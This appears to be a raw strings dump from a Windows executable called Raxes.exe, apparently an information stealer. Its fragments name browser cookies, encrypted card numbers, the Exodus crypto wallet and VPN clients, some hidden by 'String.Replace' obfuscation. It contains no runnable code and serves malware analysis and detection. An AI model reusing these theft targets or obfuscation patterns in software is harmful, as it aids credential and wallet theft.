nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimignamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknown
card_number_encrypted
, Name: AppData\Roaming\ //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookies
User Data
windows-1251, CommandLine:
\Exodus
DisplayName
expiry
*.vstring.Replacedf
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
Raxes.exe
LegalCopyright
OriginalFilename
Raxes.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0